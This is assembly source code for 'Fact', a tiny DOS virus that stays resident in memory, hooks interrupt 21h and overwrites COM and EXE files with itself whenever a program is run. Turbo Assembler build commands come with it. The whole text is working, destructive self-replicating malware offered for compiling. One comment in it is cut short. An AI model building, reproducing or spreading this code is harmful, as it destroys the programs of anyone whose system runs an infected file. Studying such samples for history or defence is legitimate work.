Fact is a 45 bytes overwriting resident COM/EXE infector. Infects files at load and/or execute program by overwriting the infected file. Compile Fact with Turbo Assembler v 4.0 by typing: TASM /M FACT.ASM TLINK /t /x FACT.OBJ .model tiny .code org 100h code_begin: mov ax,3521h ; Get interrupt vector 21h int 21h mov word ptr [int21_addr],bx mov word ptr [Int21_addr+02h],es mov ah,25h ; Set interrupt vector 21h lea dx,int21_virus ; DX = offset of int21_virus int 21h xchg ax,dx ; DX = number of bytes to keep res... int 27h ; Terminate and stay resident! int21_virus proc near ; Interrupt 21h of Fact cmp ah,4bh ; Load and/or execute program? jne int21_exit ; Not equal? Jump to int21_exit mov ax,3d01h ; Open file (write) int 21h xchg ax,bx ; BX = file handle push cs ; Save CS at stack pop ds ; Load DS from stack (CS) mov ah,40h ; Write to file mov cx,(code_end-code_begin) lea dx,code_begin ; DX = offset of code_begin int21_exit: db 0eah ; JMP imm32 (opcode 0eah) code_end: int21_addr dd ? ; Address of interrupt 21h virus_name db '[Fact]' ; Name of the virus endp end code_begin